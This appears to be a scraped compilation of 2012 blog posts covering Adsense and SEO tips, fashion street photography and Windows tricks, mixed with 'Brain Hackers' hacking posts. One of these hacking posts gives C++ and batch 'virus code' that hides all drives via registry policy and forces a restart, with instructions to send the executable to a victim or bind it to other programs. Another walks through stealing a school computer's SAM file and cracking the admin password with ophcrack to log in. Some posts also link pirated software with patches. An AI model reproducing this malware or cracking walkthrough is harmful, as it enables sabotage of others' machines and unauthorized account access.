Monday, 5 November 2012

Facts and Ways to Increase Adsense Earnings (Part 1)

Adsense is a great way to earn decent amount of money with your blogs as it is offered by Google and Google team knows how to give value to their publishers and advertisers. Personally I have tried Chikita , Adbrite and Bidvertiser and trust me their earnings are no close to what you can earn [...]

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How To Generate More Income Online

Most of us doing business online crave to have that notification that wakes our excitement every hour.  Think of the ecstasy, the encouragement, the shout, the smile that bursts out of you when you get the mail with subject like “Sales notification”. While you are generating some earnings on the Internet, I’m sure you will [...]

The post How To Generate More Income Online appeared first on SeoAllRounder.

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3 Tips for Staying Consistent at Blogging

In this post I will share with you some tips on how to remain consistent at blogging - One of the monstrous challenges bloggers face when getting into the swing of blogging, past the stage of starting their blog’s usually in the 3rd or 4th month of blogging, is how to create great content on a [...]

The post 3 Tips for Staying Consistent at Blogging appeared first on SeoAllRounder.

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High Converting Amazon WordPress Themes

Are you an amazon affiliate? planning to open an amazon store and want to make big money by promoting amazon products? Then you have landed to the right place, I have looked around for the best looking amazon WordPress themes and put them all in one place so it becomes easy for affiliates to get [...]

The post High Converting Amazon WordPress Themes appeared first on SeoAllRounder.

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On the Street….The Smarties, Soweto, SA

On the Street….The Smarties, Soweto, SA

  About a year ago I was talking about my travel wishlist  with my good friend Sam Lambert. I had mentioned visiting Africa and immediately Sam told me I had to meet this group of young men in Soweto that called themselves The Smarties.   Sam was right; these young men love fashion, design their [...]

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Where is Nicolas Ghesquière Going?

Armani?   His own company?   Who will fill his role at Balenciaga?

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On the Scene….The Neighbourgoods Market, Downtown Johannesburg, SA

The good thing about having a small artistic community is that everyone can hang out together. That’s what it felt like at The Neighbourgoods Market, a Saturday-only pop-up market/clubhouse in the center of downtown Johannesburg. Sam and I were very impressed by how natural, cool and laid back the vibe was at the market. The [...]

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On the Scene….The Neighbourgoods Market, Downtown, Johannesburg, SA

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On the Street…..33rd St., New York

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If You’re Thinking About…..Men’s Necklaces

If You’re Thinking About…..Men’s Necklaces

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New York Right Now

People have been asking (or disappointed) that I haven’t covered the Hurricane Sandy situation on the blog. Well, there is a good reason. None of this is fun, no one really feels like smiling for a camera. Garance, my little girls and I have been very lucky that we were able to get a small [...]

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On the Street….rue Rivoli, Paris

For me,  this shot is all about silhouette. I caught this while riding my bike on rue Rivoli. What caught my eye was the way the jacket sits away from the skirt, giving  you a sense of the body underneath the jacket.   I saw a similar idea while in Milan.

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On the Street…..Piazza Oberdan, Milan

On the Street…..Piazza Oberdan, Milan

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If You’re Thinking About……Peace

If You’re Thinking About……Peace

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On the Street…..Sportswear Version of Day Into Evening, Milan

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On the Street……Bedford Square, London

On the Street……Bedford Square, London

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If You’re Thinking About……Capes

If You’re Thinking About……Capes

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On the Street…..Men’s Accessories, Milan

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On the Street……rue Rivoli, Paris

I love how perfectly the suit is fit for her.  However, I think I love the contrast between floral shirt and graphic socks even better.  

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On the Street….Camilla, Barcelona

Thanks to Camilla for being a great bicycle guide during my time in Barcelona

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On the Street…….Night Johannesburg, SA

On the Street…….Night Johannesburg, SA

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If You’re Thinking About……Maroon Socks

If You’re Thinking About……Maroon Socks

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On the Street…..Camo Suit, Paris

On the Street…..Camo Suit, Paris

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On the Street….rue Perrault, Paris

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Sunday, 4 November 2012

How to create a Big size file ?

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How to Hide the Accounts in Windows system?

You may want to hide the admin or some other accounts for privacy purpose. If you are having public cafe or organization or school ,then you probably need. I am going to guide you in this article to hide the Acccounts in Windows system.

Restart the system.
When you login if you want to access the hidden account,then just press
"ctrl+alt+del" in login page.
Enter your hidden account and password.

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How to Change or Rename the Recycle bin in windows?

Go to start->run
type as regedit
and hit enter
Registry edit will open.

Navigate to this Path by clicking the plus symbol:

You can see as Recycle bin in right panel.
Change it as your wish.

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How to show SuperHidden files in xp and vista?

Some files will be hidden from Users. If you want to see those files,you have to edit the registry. This hack will fit for both windows xp and Vista.

Go to Start-<run
Enter as Regedit
Navigate to

In the right panel ,you can see the superhidden registry
Right click on the SuperHidden
Change the Data value to 1.
Click ok
Exit the registry and restart the windows.

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How to disable writing to USB?

If you are the administrator of public cafe or school,this trick will be helpful for giving protection to your system. You can disable writing to USB. This will prevent from file stealing. You have to login to administrator so that you can access regedit.

Go to start . Select run.

Type as regedit and hit enter
Now navigate to

In right panel you can find writeprotect and

Change the value to 00000001

That's all now no one can transfer data to USB. Now your system is protected.

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C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.

C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }

Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.

Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

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How to hide the windows while running the virus code?

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How to Open Microsoft 2007 file in Microsoft 2003

It may big issue to open the Microsoft 2007 files in microsoft 2003. But it is easy to open the file in Ms 2003. You have to download the MS2007 compatibility pack for Ms2003.

Download it from here:


Better start to use Ms 2007.
Old is gold but New is Diamond..!!!

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Hacking Autorun.inf virus attack Is autorun.inf virus?

When i studied second year(cse), my friends told that autorun.inf is virus. I thought so. Because my antivirus blocks autorun.inf files. In third year when i search about autorun.inf file in net, i realize about the auto run file.

Today i bring some files from my college system. When i insert the pen drive in my system, there are lot of exe files.They are viruses. I delete all of them. Finally i opened the autorun.inf file in notepad and saw the instructions. Then only i remembered that i forget to post about autorun file. This article will give you complete details about the autorun.inf file.
This is the instructions that saved in the infected(call virus programs) autorun.inf file:

is autorun.inf virus file? no. Then why antivirus block the autorun.inf files? Go ahead to know the full details about auto run file.

Introduction to Autorun.inf File:
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted. Simpy triggers.

When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?
Open notepad
type this command:
save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:
Basic syntax must be inside the autorun.inf file is :
This will be used to identify the the file as autorun.

This will specify which application should be opened when the cd or pen drive is opened

This will launch the virus.exe file when cd or pen drive is opened. The file should be in root directory.
if the file is in any other sub directories ,then we have to specify it.
Nothing big difference. if you right click and select explore option in cd or pen drive. This command will be run.

Same as the above , but it will launch the the program when auto played.


The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.



Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Change the icon of your pen drive or cd. you can use .ico,.bmp images(also .exe,.dll)


Specifies a text label to displayed for this CD in Explorer
Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Label=Ethical hacking

Why Antivirus Block Autorun.inf file?
From above ,you come to know that autorun.inf file is not virus. But why antivirus blocks it? Because as i told autorun file call or launch any application or exe files. It will lead to virus attack. If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.

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How to block or Disable Autorun.inf file in windows xp,Windows 7-Registry Edit

Brain Hackers

Depending on the version of Windows that you are using, there are different updates that you must have installed to correctly disable the Autorun functionality:
To disable the Autorun functionality in Windows XP, in Windows Server 2003, or in Windows 2000, you must have security update 950582, update 967715, or update 953252 installed.

Simple way to disable autorun.inf :
Follow this link and download the msi file:

Fix it yourself-Manually disabling the autorun feature:
To disable Autorun yourself on operating systems that do not include Gpedit.msc, follow these steps:
Click Start, click Run, type regedit in the Open box, and then click OK.

Locate and then click the following entry in the registry:

Right-click NoDriveTypeAutoRun, and then click Modify.
In the Value data box, type 0xFF to disable all types of drives. Or, to selectively disable specific drives, use a different value as described in the "How to selectively disable specific Autorun features" section.
Click OK, and then exit Registry Editor.
Restart the computer.

you can re-enable the autorun feature :
Follow this link:

Actually i get this information from here:
if you want more information or want to disable in vista, just visit the above link:

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Disable the Error Report in Windows XP

Are you getting often error report in windows xp? this trick will disable the error report creation.

  • Right-click My Computer and choose Properties.
  • Click the Advanced tab on your System Properties dialog box.
  • Click the Error Reporting button on the Advanced tab.
  • Place a checkmark next to "Disable error reporting."
  • Leave the other radio button unchecked next to the text labeled, "But notify me when critical errors occur."
  • Click OK.
that's all you finished. From now error reports will not disturb you.

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How to Disable the Thumb.db file creation?

What is Thumb.db?
when you view a image contained folder in thumbnail view,thumb.db file will be created. It is is a cache of the current picture in that remove it go for following
go to "TOOLS".
go to "VIEW".
see 1st section "FILES & FOLDERS".

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How to Make your Web cam as Security/Surveillance Camera?

Using some softwares you can change your web camera as spy or Surveillance camera. here i give you some softwares links.

Rise Sun(Complete Free Software)

Screen Shots:



  • Set the sensitivity of movement detection.
  • Detection motion within or outside a specified area .
  • Receive emails with images of any movement detected.
  • Publish movement images to your website.
  • Publish webcam images at regular intervals.
  • Timestamp your images (choice of colours and position within image)
  • Graph of movement over time (with calendar facility).
  • Start movement detection at a specified time.
  • Command line startup options.
  • Save your individual settings to different profiles.
  • Receive notification of new versions as they become available.
  • New versions autoinstall on one mouseclick(so you only need to install TeboCam once).
Screen Shots:


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Shortcut commands to open windows Programs faster

Here i give you list of shortucut commands to open the windows program faster. If you practice the shortcut ,then you will access the windows default programs much better than any others. you can impress your friends/lover or any others. No need to try all shortcuts commands, just try for frequently accessed programs.

Just press CTRL+ R and type the command and press enter.
Just go to Run and type "cmd" and then write the Shortcut commands to open windows Programs faster.

Here is the Shortcut commands for you:

appwiz.cpl ----> Add/Remove Programs
access.cpl ----> Accessibility Controls

hdwwiz.cpl ----> Add Hardware Wizard

control admintools ----> Administrative Tools
wuaucpl.cpl ----> Automatic Updates

fsquirt ----> Bluetooth Transfer Wizard
calc ----> Calculator

certmgr.msc ----> Certificate Manager

charmap ----> Character Map

chkdsk ----> Check Disk Utility

clipbrd ----> Clipboard Viewer

cmd ----> Command Prompt

dcomcnfg ----> Component Services

compmgmt.msc ----> Computer Management

control panel ----> Control Panel

timedate.cpl ----> Date and Time Properties

ddeshare ----> DDE Share

devmgmt.msc ----> Device Manager

directx.cpl ----> Direct X Control Panel

dxdiag ----> Direct X Troubleshooter

cleanmgr ----> Disk Cleanup Utility

dfrg.msc ----> Disk Defragment

diskmgmt.msc ----> Disk Management

diskpart ----> Disk Partition Manager

control desktop ----> Display Properties

desk.cpl ----> Display Properties

control color ----> Display Properties

drwtsn32 ----> Dr. Watson System Troubleshooting Utility

verifier ----> Driver Verifier Utility

eventvwr.msc ----> Event Viewer

sigverif ----> File Signature Verification Tool

findfast.cpl ----> Findfast

control folders ----> Folders Properties

control fonts ----> Fonts

fonts ----> Fonts Folder

joy.cpl ----> Game Controllers

gpedit.msc ----> Group Policy Editor

iexpress ----> Iexpress Wizard

ciadv.msc ----> Indexing Service

inetcpl.cpl ----> Internet Properties

Iexplore ----> Internet Explorer

ipconfig /all ----> IP Configuration (Connection Configuration

ipconfig /displaydns ----> IP Config (Displays DNS Cache Contents

ipconfig /flushdns ----> IP Config (Delete DNS Cache Contents

ipconfig /release ----> IP Config (Release All Connections

ipconfig /renew ----> IP Config (Renew All Connections

ipconfig /registerdns ----> IP Config (Refresh DHCP & Re-Registers DNS

ipconfig /showclassid ----> IP Config (Display DHCP Class ID

ipconfig /setclassid ----> IP Config (Modifies DHCP Class ID

jpicpl32.cpl ----> Java Control Panel (If Installed

javaws ----> Java Control Panel (If Installed

toy.cpl ----> Joystick Properties (If Installed

control keyboard ----> Keyboard Properties

main.cpl keyboard ----> Keyboard Properties

secpol.msc ----> Local Security Settings

usrmgr.msc ----> Local Users and Groups

logoff ----> Logs You Out Of Windows

winchat ----> Microsoft Chat

winmine ----> Minesweeper Game

control mouse ----> Mouse Properties

main.cpl ----> Mouse Properties

control netconnections ----> Network Connections

ncpa.cpl ----> Network Connections

netsetup.cpl ----> Network Setup Wizard

notepad ----> Notepad

nvtuicpl.cpl ----> Nview Desktop Manager (If Installed

packager ----> Object Packager

odbccp32.cpl ----> ODBC Data Source Administrator

osk ----> On Screen Keyboard

acfilter.cpl ----> Opens AC Filter (If Installed

password.cpl ----> Password Properties

perfmon.msc ----> Performance Monitor

perfmon ----> Performance Monitor

telephon.cpl ----> Phone and Modem Options

powercfg.cpl ----> Power Management

control printers ----> Printers and Faxes

printers ----> Printers Folder

eudcedit ----> Private Character Editor

QuickTime.cpl ----> Quicktime (If Installed

intl.cpl ----> Regional Settings

regedit ----> Registry Editor

regedit32 ----> Registry Editor

mstsc ----> Remote Desktop

ntmsmgr.msc ----> Removable Storage

ntmsoprq.msc ----> Removable Storage Operator Requests

rsop.msc ----> Resultant Set of Policy (XP Prof

sticpl.cpl ----> Scanners and Cameras

control schedtasks ----> Scheduled Tasks

wscui.cpl ----> Security Center

services.msc ----> Services

fsmgmt.msc ----> Shared Folders

shutdown ----> Shuts Down Windows

mmsys.cpl ----> Sounds and Audio

spider ----> Spider Solitare Card Game

cliconfg ----> SQL Client Configuration

sysedit ----> System Configuration Editor

msconfig ----> System Configuration Utility

sfc /scannow ----> System File Checker (Scan Immediately

sfc /scanonce ----> System FC (Scan Once At Next Boot

sfc /scanboot ----> System FC (Scan On Every Boot

sfc /revert ----> System FC (Return to Default Setting

sfc /purgecache ----> System FC (Purge File Cache

sfc /cachesize=x ----> System FC (Set Cache Size to size x

sysdm.cpl ----> System Properties

Taskmgr ----> Task Manager

nusrmgr.cpl ----> User Account Management

utilman ----> Utility Manager

explorer ----> Windows Explorer

firewall.cpl ----> Windows Firewall

magnify ----> Windows Magnifier

wmimgmt.msc ----> Windows Management Infrastructure

syskey ----> Windows System Security Tool

wupdmgr ----> Windows Update Launches

winver ----> Windows Version

tourstart ----> Windows XP Tour Wizard

Write ----> WordPad
If you want to open the "Add or Removal Program",just press Ctrl+R and type as "appwiz.cpl" in run box and press enter.
Likewise for opening wordpad just type "write".

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List and save the directory's name in text file

The Fastest Way of searching the directory in windows

This computer trick will save the all sub directory and file names in text file. This may helpful to analyse the direcotry(you can know what are the contents inside the window without browsing by simple commands).

Step 1:
First of all open command Prompt.
Step 2:
Browse to folder which you want to analyze the sub directories and files by using cd commands. For Example if you want to visit d:/interview folder then
try this command.
Type "d:"
then "cd interview".
Step 3:

after navigate to direcotry in command prompt,
Type this command :
dir *.* /s /b > dirlist.txt
and hit enter.
This will list all sub directories and files with their extension.

If you want to list only pdf files just use this command
dir *.pdf /s /b > dirlist.txt
Likewise, if you want to search only microsoft word files then use this command.
dir *.doc /s /b > dirlist.txt
If you want to search and list only files that has some certain name. For example, Resume.doc then try this command
dir Resume.* /s /b > dirlist.txt
dir Resume.doc /s /b > dirlist.txt

Step 4:
you can find the dirlist.txt file in that directory. i mean it will d:/interview directory.

Step 5:
open the text file in notepad or notepad++ ,then search your desired file name or folder(for example "resume"),you will get the full path to the file. This is fastest search than the usual windows search.

Note: Don't waste your time, use this computer trick to search the drive or folder faster.
Hope you understand the trick. This is fastest way of browsing the folder . if you have any doubts ,feel free to ask me. I will answer if i am able to. Don't spam!

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How to Create Con Folder in windows using Cmd? Brain Hackers

we all know that can't create con folder in windows.

Here is simple trick to create con folder in windows using Command Prompt.

Step 1:
Open Command Prompt(Start->run->cmd)
Step 2:
Type this command:
md \\.\d:\con
This will create con folder in D Drive.
Step 3:
To Remove the folder type this command
rd \\.\d:\con
This will remove con folder from D Drive

How we are able to create the con and other folder using this trick?

It is just because of the
UNC Path (Universal Naming Convention). The Universal Naming Convention, or UNC, specifies a common syntax to describe the location of a network resource, such as a shared file, directory, or printer.Since, these conventions did n't exist under pure DOS, they are not backward compatible. The UNC syntax for Windows systems is as follows..


where RemoteHost is the computer name / IP address of the computer that you wish to connect through remotely for accessing shared folder. The rest is the path.

(Here \\remotehost\drive:\con doesn't make sense anyway, because without having a process on the remote host, there is no current 'console'). It would be a security hazard as well, having the serial and parallel ports accessible for everyone who is allowed to read or write in any single directory.

The "." in the command \\.\c:\con suggest the local server. Now, you are pointing to your own computer. since, you have all privilages on every folder of ur computer, you can easily create it.

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why can not we create con folder in windows?

A Reason Behind the Con Folder Creation in Windows

We all know that we can't create Con, Folder in windows. not only con but also " PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9 and more".

Here i am going to explain why you can not create the con folder in windows.


We can not create folder with con,aux, nul because these are reserved keywords used by DOS. so if u r allowed to create such folders, there will be an ambiguity in where to write data when the data is supposed to go to the specified devices. In other words, if i want to print something, internally what windows does is -- it will write the data to the folder prn (virtually u can call it a folder, i mean prn, con, etc are virtual folders in device level). So if we are able to create con folder, windows will get confused where to write the data, to virtual con folder or real one.

Keywords and Their corresponding Functions:
Reserved Keywords Function
CON Keyboard and Display
PRN System list device, usually a parellel port
AUX Auxiliary Device,usually a serial port
NUL Bit-Bucket Device
A:-Z: Drive Letter
COM1 First Serial communications port
COM2 Second Serial communications port
COM3 Third Serial communications port
COM4 Fourth Serial communications port
LPT1 First Parallel printer port
LPT2 second Parallel printer port
LPT3 Third Parallel printer port

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How to hack the Windows 7 or Vista passwords-Become a hacker

Hi Brain Hackers Friends,
"How to Hack windows admin?" This will teach you how to hack the windows password. You can use the above tutorial for hacking any type of windows Operating system. For Example: you can hack the latest Windows 7 also.

There is only one change is required to do. i.e., You have to choose the correct Rainbow table corresponding to the Operating system that you are going to hack.

You can get all type of rainbow table from here:

Hacking Windows XP

If you are going to hack the windows xp accounts(usually admin) password. Then you have to download the
XP free fast (703MB) rainbow table.

Hacking Windows 7 or Windows vista

We all know that windows 7 is upgraded version of Vista. So the same rainbow table is used.(because same type of Hash code created by both).
So You have to download the Vista free (461MB) rainbow table.

How ophcrack tool impressed me?
Recently i have tested this tool in my system. In order to test , i create new account with "secure123" password. When i click the crack button, i got the password within seconds. I know this is weak password. So i thought it is not big issue to crack this silly password.

But when i try with my friend system, i am really impressed. Do you know why? He put the strong password for his windows 7 os( a password with upper&lower case combination,Special character,numbers). Because the ophcrack takes less than 1 seconds to crack this password. It is so interesting how the design this wonderful software.

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How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial

If you are School/College/University students, you may curious to hack the admin password in your college or school system. This post is going to help you to crack the any type of windows accounts passwords. Learn how to hack the windows admin password like a geek.

  • BackTrack Linux 4 or 5. Download it from
  • Two Pen drives [if you are going to test in your own system, one pen drive is enough]
  • Xp Free Fast RainBow table []. Download it from here:

Install the Backtrack Linux in one pen drive. Leave another pen drive as empty.

Step 1: Booting From Back Track
Insert the Backtrack installed pen drive in target computer[when turned off]. We are going to boot the operating system from pen drive, so insert when the system is turned off.
Now Turn on the system.
Press F10 [boot menu, differs for system] before booting and select boot from Pen drive.
Now it will boot the Backtrack.
Select "Graphical User Interface "
Now wait for a while ( it will execute some commands}
Now you can see the "root:"
type "startx" and hit enter. It will bring you to the GUI view of Backtrack.

Step 2:Copy the SAM and System files
Click the Start button(dragon symbol)
Select System Menu
Select Storage Media(if you see nothing, close the window open it again).

You can see the list of Hard disk and Your pen drive.
Open the windows installed Hard disk and Navigate to this path:

There you can see two files named as "SAM" and "System".

Copy the both SAM and system files.
[ Just proceed to next step without closing the window]

Step 3:Insert your Empty Pen Drive
Now again go to System Menu->Storage Media
Open Your pen drive(Empty Pen drive) ,Create a new folder and paste the sam and system files inside that folder

[note: you may not paste into your backtrack installed pen drive. that's why i asked you to bring 2 pen drives. If you testing in your system, then you can copy to any other hard drive.]

You can not directly copy the sam and system files from same operating system. That's why we are using Backtrack.

Step 4:Now go to your home.
Boot into windows. Extract the "" in any hard drive.
Copy the folder that contains sam and system files from your pen drive.
Paste in any hard drive.
Restart the windows.
Insert the Backtrack installed pen drive and boot from Pen drive.

Step 5: Mounting the Hard drive in Backtrack

Now go to System Menu->Storage Media(if you see nothing, close the window open it again).
and open the hard drives that contains sam files and rainbow tables. Then close it.

Don't be confused. I asked you to open those hard drive for mounting purpose. In linux , it won't mount automatically until you open the drive

Step 6: Run OphCrack Tool in Backtrack
Open the ophcrack GUI(start->Backtrack->Privilege Escalation->Password Attack->offline Attacks-ophCrack GUI).

Ophcrack GUI application will run now.

Step 7: Loading the folder that contains sam and system files

Click the Load and select "Encrypted SAM" in ophcrack tool.
Now it will ask you to select directory that contains SAM folder.

[Select Computer in file selecting window. click '/' browse to /media/your_Hard_Disk]
Select the directory(don't open the directory, just select it).

Now it will load and display the list of user accounts in the windows.

Step 8: Target the Admin Account
Here i am going to hack the one of the administrator account "secure" of my computer.
So remove all other accounts except the target admin account.[This is not necessary, but it will increase the cracking speed] by clicking delete button.

Step 9: Install the Rainbow Table
Now let us install the Rainbow table.
Click the Table button in ophcrack tool.
Now it will ask you to selec the table.
we are going to crack windows password right?. So choose the first one. and click the install button.
[note: i have installed the rainbow table already. So it showing green.]

Now browse to the Rain bow table directory. I mean to the "tables_xp_free_fast" folder.
[here also, don't open the foler, just choose it]

now click ok.

Step 10: Cracking Begins
Click the Crack button.
Wait for a while [ophcrack is the fastest cracking tool. so it won't take too much time]

Step 11: Password is cracked
Yes..!! we got the password. Now go to your school/college and login with that password.
Enjoy. Don't forget to share with your friends. This is interesting one na..!
Actually i missed the fun. I didn't know this hack when i study in college. if i know that time itself,
i may have fun with my college system.

Using Backtrack Installed CD Or single Pen drive:
You will need only one pen drive, if you are going to hack the admin password in the target system itself. Don't forget to bring the rainbow table in your backtrack pen drive in this case.

you can use cd instead of Pen drive for backtrack installation.
If you use cd, you can not bring the SAM file to your home. You have to crack it in that computer itself

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How to Clear/Flush DNS cache in Linux/Windows/Mac OS?

If a website newly registered in internet world, it may not be loaded in your computer. For example, you register for yesterday, still you may not see your web page. This is problem of DNS cache. Your local DNS cache is old one so it won't know the newely available domain names. Sometime you may update the NS records of your domain to point to new hosting service.

In these case you have to clear or flush cache in your computer.

How to Flush cache in Windows?

  1. Open Command Prompt(Start->Run , type cmd and hit enter).
  2. In command promt type
    ipconfig /flushdns
  3. hit enter
Your DNS cache is cleared now, try to load your new website.

How to Clear Cache in Linux?
First of all you have to install nscd . (only 250kb).
Open terminal and type
sudo apt-get install nscd
Type this command to restart the DNS cache server in Linux:
sudo /etc/rc.d/init.d/nscd restart

How to Clear Cache in Mac Os?
Open the Terminal
Type the following command:
dscacheutil -flushcache

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How to Re-Enable Task Manager,System Restore,cmd,run,Registry?

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Realplayer Gold plus 11 for Free Download Full Version

Realplayer Gold plus 11

Real Player Gold Plus 11: The best media player for watching, downloading, converting & organising your videos.
Real Player Gold Plus 11 Gives You the Ability to download videos from Thousands of Web sites with just one click, and even now You Can Burn Them to CD. Watch Them Whenever and wherever you want. Download Internet videos with one click, build your own video library and playlists, or burn your favorite videos to CD or DVD with RealPlayer. RealPlayer plays all major audio and video formats.

Real Player Gold Plus 11 is the new version of one of the most respected multimedia players the Internet, RealPlayer. After all, who never met a file in RM or RMVB? Of course, these formats have lost some popularity because of the evolution and rise of other codecs, however RealNetworks still bet on disclosure of your player to stay well in the market.
In eleventh version, RealPlayer finally allows competing formats to be played, such as Flash videos and extension MOV, QuickTime. Courage to sail the seas enemies or just a question of survival? Only the future can tell, but the decision is bold.

Download the file Click Here

Password of RAR File : brain hackers

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SPAMfighter 7.5.149 for Free Download Full Version

SPAMfighter 7.5.149

SPAMfighter works with Microsoft Outlook and Outlook Express. Spam is identified with a list from other users. Every time you mark a message as spam everybody else with SPAMfighter has it automatically marked and deleted.

You can create a whitelist with SPAMfighter so that emails from people in your address book will always get through.

The SPAMfighter website has a running total of the number of emails processed and the new users who have joined the group.

SPAMfighter is free for home users. Note that there is a Professional version available which offers even more protection, such as an advanced filter, the ability to remove the Spamfilter footer added to your outgoing emails, commercial support and much more.
Platform: Windows Vista 64-bit, Windows 7, Windows 7 64-bit, Windows Vista, Windows XP

Download the file Click Here

Password of RAR File : brain hackers

Posted by R2blog. R2blog auto post for blogspot. Download at

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CuteFTP 8 Professional for Free Download with Patch Full Version

CuteFTP 8 Professional for Free Download

Cute FTP 8 Professional-Cute FTP Professional is a powerful FTP client for Windows. It enables you to connect and transfer files securely using SFTP (Secure Shell/SSH), FTPS (Secure Socket Layer (SSL) over FTP) and one-time passwords. You can transfer files quickly using CuteFTP Professional's multipart transfer and simultaneous connections. Easily manage and maintain your Web site with the built-in HTML editor, as well as the Folder Synchronization, Folder Monitor, Site Backup, and Compression tools.
Cute FTP Professional also lets you schedule, automate, and prioritize transfers using a transfer queue.
Intelligently and securely move your important files across multiple locations and over the Internet.
Whether for use at home or at the office, the industry-leading CuteFTP software family lets you intelligently and securely move your important files across multiple locations and between various contacts over the Internet. CuteFTP Professional is the right choice when you want the ultimate in power, performance and security. CuteFTP Home makes it easy to publish web pages, download the latest music, images, or software, or transfer files between your home and office. CuteFTP Mac Pro is the most advanced Mac FTP client available. And, for those of you who just want the basics, check out CuteFTP Lite, a solution with all of the basic features you need to quickly and easily finish your file transfer task.

1. Extract Data with WinRAR
2. Install cuteftppro
3. Go to Patch Folder and Run Patch

This is WinRAR file. You must be install WinRAR on your system. For Downloading WinRAR Click

Download the file Click Here

Password of RAR File : brain hackers

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Top 5 Ways to Boost Traffic to Your Site

Ever since the advent of the Search Engine Optimization by Google, there has been a clamor among websites to increase traffic. Higher traffic allows for more popularity of the website, and also brings in higher number of revenue through advertisements to the website. There are some simple ways to boost one’s web traffic as listed and explained below:

SEO Keywords

One should check Google’s research tool to research and come up with keywords that are commonly searched for, and appropriate to the content posted on one’s website. Keyword popularity is as important as is keyword usability. After a keyword or keywords have been chosen, it is advisable to have keywords planted in the content of the website as well as in the titles of the articles. This is due to the fact that the web can’t read anything other than HTML. Thus if the HTML has the SEO Keywords peppered in it, it would be higher on the rating charts.

Original and Honest articles

It is paramount for web articles to be original, as any web search engine has a module to check for plagiarism in the website’s articles. In case any are found to be plagiarized, the website loses page rank as it is blacklisted by the engine. Honest work is equally important, as quality often contributes to the popularity of a webpage. For instance, if a website provides honest reviews with links for software or technology, it is known to bring in a higher page rank and more viewers. Submitting articles to article directories can also provide backlinks which increase traffic. Their requirements include unique content.

Social Sharing

With the world presenting an overwhelming presence in the social networking universe, one cannot ignore this potential source of traffic. Inclusion of sharing buttons to different social networking sites like Google+, Facebook, Twitter etc. can kick off social bookmarking which is now the easiest way to SEO. This allows a user to get backlinks from the social networking websites.

Forum Commenting

One of the most classic methods is to find target audience. If one’s website caters to people who cook, then it would be beneficial to get traffic with expertise or interest in such matters. Thus, checking out and joining online forums dedicated on such topics would be commendable. One should leave intelligent and targeted comments on these forums with backlinks to one’s websites. This is akin to rubbing someone’s back to get a back rub of one’s own.

Linking and Updating

If one has a website with multiple links then one should ensure that he links the new articles with older articles to get redirected traffic on different pages in the website from in the site itself. Thus, this calls for the website to have interrelated material to an extent. One should also try and write timeless articles, ones which are not rendered redundant by the world within a few months or years. Thus the choosing of topics that are always needed ensure that even the oldest of posts generates a lot of traffic.

This is a guest post contribution by Osho Garg, who writes for, a site that offers link to the best loan options for their readers.

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